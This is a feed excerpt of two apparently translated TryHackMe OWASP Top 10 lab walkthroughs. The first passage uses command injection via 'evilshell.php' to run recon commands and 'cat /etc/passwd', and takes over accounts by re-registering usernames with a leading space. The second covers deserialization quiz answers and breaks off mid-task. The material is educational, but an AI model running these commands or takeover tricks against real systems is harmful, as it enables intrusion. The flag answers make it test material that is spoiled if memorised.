<li id="c00d" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw jk jl jm gr" data-selectable-paragraph="">whoami</li>
<li id="5fb5" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">id</li>
<li id="7720" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">ifconfig/ip addr</li>
<li id="cb48" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">uname -a</li>
<li id="5435" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">ps -ef</li>
</ul>
<p id="05dd" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw dn gr" data-selectable-paragraph=""><strong class="ib da">Windows</strong></p>
<ul class="">
<li id="d15d" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw jk jl jm gr" data-selectable-paragraph="">whoami</li>
<li id="0817" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">ver</li>
<li id="f839" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">ipconfig</li>
<li id="37fe" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">tasklist</li>
<li id="c086" class="hz ia fv ib b ic jn ie if ig jo ii ij ik jp im in io jq iq ir is jr iu iv iw jk jl jm gr" data-selectable-paragraph="">nestat -an</li>
</ul>
<p>To answer the questions below you need to navigate to <a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2F10.10.147.50%2Fevilshell.php" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">http://10.10.147.50/evilshell.php.</a></p>
<h4 id="ftoc-1-tap-tin-van-ban-la-nao-nam-trong-thu-muc-root-cua-trang-web" class="ftwp-heading">#1 What strange text file is in the website root directory?</h4>
<p>We can go to evilhell.php and try the whoami command.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34563 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_8fV_l8QsQya_YZzDL1Vitg.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 24" width="525" height="404" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_8fV_l8QsQya_YZzDL1Vitg.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_8fV_l8QsQya_YZzDL1Vitg-300x231.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 29"/></p>
</p>
<p>Try next command <code>uname -a</code>.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34564 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_xwUOsPsRpCPKUOeU99vUPQ.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 25" width="525" height="399" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_xwUOsPsRpCPKUOeU99vUPQ.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_xwUOsPsRpCPKUOeU99vUPQ-300x228.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 30"/></p>
<p>Continue to try the command <code>ls</code>.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34561 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_DakOlOzD46OiuE9VfzGQ1g.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 26" width="525" height="392" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_DakOlOzD46OiuE9VfzGQ1g.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_DakOlOzD46OiuE9VfzGQ1g-300x224.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 31"/></p>
<p>What do you see?  I found the file drpepper.txt.</p>
<h4 id="ftoc-2-co-bao-nhieu-nguoi-dung-khong-phai-root-non-service-non-daemon" class="ftwp-heading">#2 How many non-root/non-service/non-daemon users are there?</h4>
<p>You can try the command<code> cat /etc/passwd</code></p>
</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34566 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_2Lvbf0U3RwrNxi0lBu0D5A.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 27" width="525" height="558" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_2Lvbf0U3RwrNxi0lBu0D5A.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_2Lvbf0U3RwrNxi0lBu0D5A-282x300.jpg 282w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 32"/></p>
<p>Couldn&#8217;t find anything.</p>
<h4 id="ftoc-3-ung-dung-nay-dang-chay-voi-tu-cach-nguoi-dung-nao" class="ftwp-heading">#3 What user is this application running as?</h4>
<p>We found it upstairs, but let&#8217;s rewrite the whoami command.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34563 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_8fV_l8QsQya_YZzDL1Vitg.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 24" width="525" height="404" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_8fV_l8QsQya_YZzDL1Vitg.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_8fV_l8QsQya_YZzDL1Vitg-300x231.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 29"/></p>
<p><strong>Answer:</strong> www-data</p>
<h4 id="ftoc-4-shell-cua-nguoi-dung" class="ftwp-heading">#4 User Shell?</h4>
<p>We can find it with the command cat /etc/passwd.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34567 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_1qBRRcXVPtEdEWoRp7uEkA.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 29" width="422" height="69" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_1qBRRcXVPtEdEWoRp7uEkA.jpg 422w, https://anonyviet.com/wp-content/uploads/2021/10/1_1qBRRcXVPtEdEWoRp7uEkA-300x49.jpg 300w" sizes="auto, (max-width: 422px) 100vw, 422px" title="TryHackMe: OWASP Top 10 Challenge Part 1 34"/></p>
<p><strong>Answer:</strong> usr/sbin/nologin</p>
<h4 id="ftoc-5-phien-ban-ubuntu-dang-chay" class="ftwp-heading">#5 What version of Ubuntu is running?</h4>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34568 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_tgRFYDHuo5SJYF2PJZ8_9A.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 30" width="700" height="388" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_tgRFYDHuo5SJYF2PJZ8_9A.jpg 700w, https://anonyviet.com/wp-content/uploads/2021/10/1_tgRFYDHuo5SJYF2PJZ8_9A-300x166.jpg 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="TryHackMe: OWASP Top 10 Challenge Part 1 35"/></p>
<p>As the picture above, you just need to enter the command<code> lsb_release -a</code> to know the Ubuntu version the application is running.</p>
<p><strong>Answer:</strong> 18.04.4</p>
<h4 id="ftoc-6-xem-motd" class="ftwp-heading">#6 Watch MOTD</h4>
<p>Just do a little search on the internet and you will know the command to show MOTD.  MOTD (Message Of The Day) is the message when you start an application in the terminal.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34569 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_jLfpOm0ZYjCFdb9UEAhHuw.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 31" width="525" height="436" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_jLfpOm0ZYjCFdb9UEAhHuw.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_jLfpOm0ZYjCFdb9UEAhHuw-300x249.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 36"/></p>
<div class="TnITTtw-t TnITTtw-inside-layout">
<div class="TnITTtw-t TnITTtw-content">
<div class="TnITTtw-t TnITTtw-help-selected-wrap TnITTtw-hsw-54 TnITTtw-has-bottom-arr0w">
<div class="TnITTtw-t TnITTtw-help-inside-layout TnITTtw-hil-54">
<div id="TnITTtw-trVisibleLayout-54" class="TnITTtw-trVisibleLayout TnITTtw-t">
<div id="TnITTtw-trEntireLayout-54" class="TnITTtw-trEntireLayout TnITTtw-t">
<div class="TnITTtw-t TnITTtw-content-layout TnITTtw-content-layout-54">
<div class="TnITTtw-padded-single-translation TnITTtw-trans-wrap TnITTtw-t">
<p>The path of the MOTD file is /etc/update-motd.d.  I tried, but nothing.  I&#8217;m so confused, I decided to come back to see the suggestion :v.</p>
<div class="TnITTtw-mv-translit TnITTtw-translation-translit TnITTtw-t"><img decoding="async" loading="lazy" class="size-full wp-image-34570 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_-VfWtYoDRwBbUZq9XMbl0g.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 32" width="402" height="97" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_-VfWtYoDRwBbUZq9XMbl0g.jpg 402w, https://anonyviet.com/wp-content/uploads/2021/10/1_-VfWtYoDRwBbUZq9XMbl0g-300x72.jpg 300w" sizes="auto, (max-width: 402px) 100vw, 402px" title="TryHackMe: OWASP Top 10 Challenge Part 1 37"/></div>
<p>cat /etc/update-motd.d/00-header</p>
<div class="TnITTtw-more-butt0n TnITTtw-t iw-mTrigger" data-to="vi"><img decoding="async" loading="lazy" class="size-full wp-image-34565 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_0BrDecJbGLsI4AIVhY1h_w.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 33" width="525" height="518" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_0BrDecJbGLsI4AIVhY1h_w.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_0BrDecJbGLsI4AIVhY1h_w-300x296.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/10/1_0BrDecJbGLsI4AIVhY1h_w-75x75.jpg 75w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 38"/></div>
<p>Successful!</p>
<p><strong>Answer:</strong> DR PEPPER</p>
<h3 id="ftoc-nhiem-vu-7-muc-do-nghiem-trong-2-broken-authentication" class="ftwp-heading" data-to="vi">Mission 7: [Mức độ nghiêm trọng 2] Broken Authentication</h3>
<p>For this vulnerability, we will study a logical flaw in the authentication mechanism.</p>
<p>Developers often forget to filter user-provided input (username and password) in their application, which can leave the application vulnerable to SQL injection attacks.  And we&#8217;re going to focus on a security flaw that&#8217;s caused by developer error but is very easy to exploit &#8211; re-registering an existing user.</p>
<p>For example, let&#8217;s say there is an existing user with the name admin and now we want to have access to that account, so what we can do is try to register that username again but there slightly modified.  We will enter “admin” (note the space at the beginning).  Now when you enter that information in username field and enter other required information like email or password and send that data.  It will register a new user but that user will have the same permissions as normal admin.  That new user will also be able to view all of the content presented under the user admin privileges.</p>
<p>To see the demo go to the website http://10.10.147.50:8888 and try to register the username, you will see that user already exists, so try to register a user “darren” and you will see that we are now signed in and will be able to view content that is only available in Darren&#8217;s account, and this is where we exploit this vulnerability.</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34575 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_Dc_UP6UknviIYh4qR5W4Qw.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 35" width="511" height="468" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_Dc_UP6UknviIYh4qR5W4Qw.jpg 511w, https://anonyviet.com/wp-content/uploads/2021/10/1_Dc_UP6UknviIYh4qR5W4Qw-300x275.jpg 300w" sizes="auto, (max-width: 511px) 100vw, 511px" title="TryHackMe: OWASP Top 10 Challenge Part 1 40"/></p>
<p>I put a space in front of the word darren.</p>
<p>I am logged in as a member.  It&#8217;s successful!</p>
<p>We have found the flag.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34577 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_x7K9YPxkHgz_3I83DfUDnw.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 38" width="525" height="200" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_x7K9YPxkHgz_3I83DfUDnw.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_x7K9YPxkHgz_3I83DfUDnw-300x114.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 43"/></p>
</p>
<p><strong>Answer:</strong> fe86079416a21a3c99937fea8874b667</p>
<h4 id="ftoc-2-bay-gio-hay-thu-thuc-hien-thu-thuat-tuong-tu-va-xem-lieu-ban-co-the-dang-nhap-bang-tai-khoan-arthur-hay-khong" class="ftwp-heading">#2 Now try to do the same trick and see if you can login with arthur account.</h4>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34572 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_tmWl4KqK3mM6tZH4itkPUA.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 39" width="525" height="483" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_tmWl4KqK3mM6tZH4itkPUA.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_tmWl4KqK3mM6tZH4itkPUA-300x276.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 44"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34573 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_pKME8r2QnCWGB1OV9l7Fqg.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 36" width="525" height="171" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_pKME8r2QnCWGB1OV9l7Fqg.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_pKME8r2QnCWGB1OV9l7Fqg-300x98.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 41"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34574 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_TvQuX_RAIZvzEGYh9JpF8g.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 41" width="472" height="360" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_TvQuX_RAIZvzEGYh9JpF8g.jpg 472w, https://anonyviet.com/wp-content/uploads/2021/10/1_TvQuX_RAIZvzEGYh9JpF8g-300x229.jpg 300w" sizes="auto, (max-width: 472px) 100vw, 472px" title="TryHackMe: OWASP Top 10 Challenge Part 1 46"/></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34571 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_zlVnVTGlMBxj91jBYoKbTg.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 34" width="525" height="207" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_zlVnVTGlMBxj91jBYoKbTg.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_zlVnVTGlMBxj91jBYoKbTg-300x118.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 39"/></p>
<h4 id="ftoc-3-flag-ma-ban-tim-thay-trong-tai-khoan-cua-arthur-la-gi" class="ftwp-heading">#3 What&#8217;s the flag you found in Arthur&#8217;s account?</h4>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34576 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_pxP47vPptHfBR71n3ZttaQ.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1 43" width="509" height="163" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_pxP47vPptHfBR71n3ZttaQ.jpg 509w, https://anonyviet.com/wp-content/uploads/2021/10/1_pxP47vPptHfBR71n3ZttaQ-300x96.jpg 300w" sizes="auto, (max-width: 509px) 100vw, 509px" title="TryHackMe: OWASP Top 10 Challenge Part 1 48"/></p>
<p><strong>Answer:</strong> d9ac0f7db4fda460ac3edeb75d75e16e</p>
<p>Complete 2 common errors in OWASP 10, Broken Authentication and Command Injection.</p>
<p>The next part will still be exploiting other bugs in OWASP 10.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;34547&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/tryhackme-owasp-top-10-challenge-part-1/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/10/0_2NSPrwCU5nN8bQHP.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>TryHackMe: OWASP Top 10 Challenge [Phần 3]</title>
		<link>https://en.anonyviet.com/tryhackme-owasp-top-10-challenge-phan-3/</link>
					<comments>https://en.anonyviet.com/tryhackme-owasp-top-10-challenge-phan-3/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 25 Jan 2023 16:30:08 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[challenge]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Phần]]></category>
		<category><![CDATA[Top]]></category>
		<category><![CDATA[Tryhackme]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3111</guid>

					<description><![CDATA[Continuing with part 2, in this article I will guide you to exploit OWASP vulnerabilities such as Insecure Deserialization, Components With Known Vulnerabilities, and Insufficient Logging &#038; Monitoring in challenge OWASP Top 10. Join the channel Telegram of the AnonyViet 👉 Link 👈 TryHackMe: OWASP Top 10 Challenge [Phần 3] Mission 21: [Mức độ nghiêm [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>Continuing with part 2, in this article I will guide you to exploit OWASP vulnerabilities such as <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftoan9.com%2Ftim-hieu-ve-loi-insecure-deserialization-trong-ung-dung-web%2F%23%3A%7E%3Atext%3DInsecure%2520Deserialization%2520l%25C3%25A0%2520l%25E1%25BB%2597i%2520x%25E1%25BA%25A3y%2C%25C3%25BD%2520c%25E1%25BB%25A7a%2520ng%25C6%25B0%25E1%25BB%259Di%2520khai%2520th%25C3%25A1c." rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Insecure Deserialization</a>, <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwebsitehcm.com%2Ftop-10-lo-hong-bao-mat-theo-owasp%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Components With Known Vulnerabilities, and Insufficient Logging &#038; Monitoring</a> in challenge <a target="_blank" class="dy ix ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftryhackme.com%2Froom%2Fowasptop10" rel="noopener ugc nofollow external" onclick="this.target='_blank';">OWASP Top 10.</a></strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img alt="TryHackMe: OWASP Top 10 Challenge [Phần 3]" title="TryHackMe: OWASP Top 10 Challenge [Phần 3]" post-id="3111" fifu-featured="1" decoding="async" class="aligncenter wp-image-34826 size-full" src="https://anonyviet.com/wp-content/uploads/2021/10/1_TPtoIN4c4bLgS8fCGCU8Wg.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3]" width="525" height="318" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_TPtoIN4c4bLgS8fCGCU8Wg.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_TPtoIN4c4bLgS8fCGCU8Wg-300x182.jpg 300w" sizes="(max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 27"/></p>
<h2 id="ftoc-tryhackme-thu-thach-owasp-top-10-phan-3" class="ftwp-heading"><strong>TryHackMe: OWASP Top 10 Challenge [Phần 3]</strong></h2>
<h3 id="ftoc-nhiem-vu-21-muc-do-nghiem-trong-8-insecure-deserialization" class="ftwp-heading"><strong>Mission 21: [Mức độ nghiêm trọng 8] Insecure Deserialization</strong></h3>
<p>What applications are vulnerable?</p>
<p>Any application that stores or fetches data for which no authentication or integrity check is applied to the queried or stored data.  Some examples of applications of this nature are:</p>
<ul>
<li>E-commerce website</li>
<li>Forum</li>
<li>API</li>
<li>Runtimes applications (Tomcat, Jenkins, Jboss, &#8230;)</li>
</ul>
<p>You can learn more about Insecure Deserialization <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftoan9.com%2Ftim-hieu-ve-loi-insecure-deserialization-trong-ung-dung-web%2F%23%3A%7E%3Atext%3DInsecure%2520Deserialization%2520l%25C3%25A0%2520l%25E1%25BB%2597i%2520x%25E1%25BA%25A3y%2C%25C3%25BD%2520c%25E1%25BB%25A7a%2520ng%25C6%25B0%25E1%25BB%259Di%2520khai%2520th%25C3%25A1c." rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here</a>.</p>
<h4 id="ftoc-1-ai-da-phat-trien-ung-dung-tomcat" class="ftwp-heading">#1 Who developed the Tomcat application?</h4>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34827 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_2sPpIM33C09WPkdrOMuLYg.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 25" width="254" height="311" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_2sPpIM33C09WPkdrOMuLYg.jpg 254w, https://anonyviet.com/wp-content/uploads/2021/10/1_2sPpIM33C09WPkdrOMuLYg-245x300.jpg 245w" sizes="auto, (max-width: 254px) 100vw, 254px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 28"/></p>
<p><strong>Answer:</strong> Apache Software Foundation</p>
<h4 id="ftoc-2-loai-tan-cong-nao-lam-hong-cac-dich-vu-co-the-duoc-thuc-hien-voi-tinh-nang-giai-ma-khong-an-toan" class="ftwp-heading">#2 What kind of attacks that crash services can be done with insecure decryption?</h4>
<p>This definition is still quite broad.  But can be understood like this, unsafe decryption is replacing the data processed by the application with malicious code;  allows anything from DoS (Denial of Service) to RCE (Remote Malware Execution) that an attacker can use to gain a foothold in pentesting.</p>
<p><strong>Answer: </strong>Denial of Service</p>
<h3 id="ftoc-nhiem-vu-22-muc-do-nghiem-trong-8-giai-ma-khong-an-toan-doi-tuong" class="ftwp-heading"><strong>Mission 22 [Mức độ nghiêm trọng 8] Unsecure Decryption – Object</strong></h3>
<h4 id="ftoc-1-chon-thuat-ngu-dung-cua-cau-sau" class="ftwp-heading">#1 Choose the correct term of the following sentence:</h4>
<p id="67cc" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw dn gr" data-selectable-paragraph=""><strong class="ib da">if a dog was sleeping, would this be:</strong></p>
<p id="9336" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw dn gr" data-selectable-paragraph="">A) A State<br />B) A Behaviour</p>
<p data-selectable-paragraph=""><strong>Answer:</strong> A Behaviour</p>
<h3 id="ftoc-nhiem-vu-23-muc-do-nghiem-trong-8-insecure-deserialization-deserialization" class="ftwp-heading"><strong>Mission 23: [Mức độ nghiêm trọng 8]</strong> <strong class="ib da">Insecure Deserialization — Deserialization</strong></h3>
<p>Suppose you have a password “password123” from a program that needs to be stored in a database on another system.  To move across a network, this string/output needs to be converted to binary.  Of course, the password needs to be stored as “password123” and not its binary string.  When it reaches the database, it will be converted or <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fqastack.vn%2Fprogramming%2F3316762%2Fwhat-is-deserialize-and-serialize-in-json" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">deserialised</a> back to “password123” to be stored.</p>
<h4 id="ftoc-1-ten-cua-dinh-dang-co-so-2-ma-du-lieu-duoc-gui-qua-mang-la-gi" class="ftwp-heading">#1 What is the name of the base 2 format in which data is sent over the network?</h4>
<p><strong>Answer:</strong> binary</p>
<h3 id="ftoc-nhiem-vu-24-muc-do-nghiem-trong-8-insecure-deserialization-cookies" class="ftwp-heading"><strong>Mission 24 [Mức độ nghiêm trọng 8]</strong> <strong class="ib da">Insecure Deserialization — Cookies</strong></h3>
<h4 id="ftoc-1-neu-cookie-co-duong-dan-la-webapp-com-login-thi-url-ma-nguoi-dung-phai-truy-cap-se-la-gi" class="ftwp-heading">#1 If the cookie has a path of webapp.com/login, what is the URL the user has to visit?</h4>
<p><strong>Answer:</strong> webapp.com/login</p>
<h4 id="ftoc-2-tu-viet-tat-cua-cong-nghe-web-ma-secure-cookies-hoat-dong-tren-do-la-gi" class="ftwp-heading">#2 What is the acronym for the web technology that Secure cookies work on?</h4>
<p><strong>Answer:</strong> Https</p>
<h3 id="ftoc-nhiem-vu-25-muc-do-nghiem-trong-8-insecure-deserialization-cookies-practical" class="ftwp-heading"><strong>Mission 25: [Mức độ nghiêm trọng 8] <strong class="ib da">Insecure Deserialization — Cookies Practical</strong></strong></h3>
<p>I will log in to a website like the one below.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34829 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_sH1S2h0l_gOtdcitAtAgQw.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 26" width="525" height="350" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_sH1S2h0l_gOtdcitAtAgQw.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_sH1S2h0l_gOtdcitAtAgQw-300x200.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 29"/></p>
<p>Create an account.  No need to enter details, you can enter what you like.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34830 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_Dh33Tsl6f2TOEn3HD760Ug.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 27" width="525" height="281" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_Dh33Tsl6f2TOEn3HD760Ug.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_Dh33Tsl6f2TOEn3HD760Ug-300x161.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] 30"/></p>
<p>Notice on the right, you have your details.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34832 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_Y0gvcqZ27yn1yOMCarypyg.jpg" alt="TryHackMe: OWASP Top 10 Challenge [Phần 3] 28" width="525" height="219" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_Y0gvcqZ27yn1yOMCarypyg.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/1_Y0gvcqZ27yn1yOMCarypyg-300x125.jpg 300w" sizes="auto, (max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge [Phần 3] thirty first"/></p>
<p>Right click on the page and hit “Inspect Element” then go to the “Storage” tab.</p>
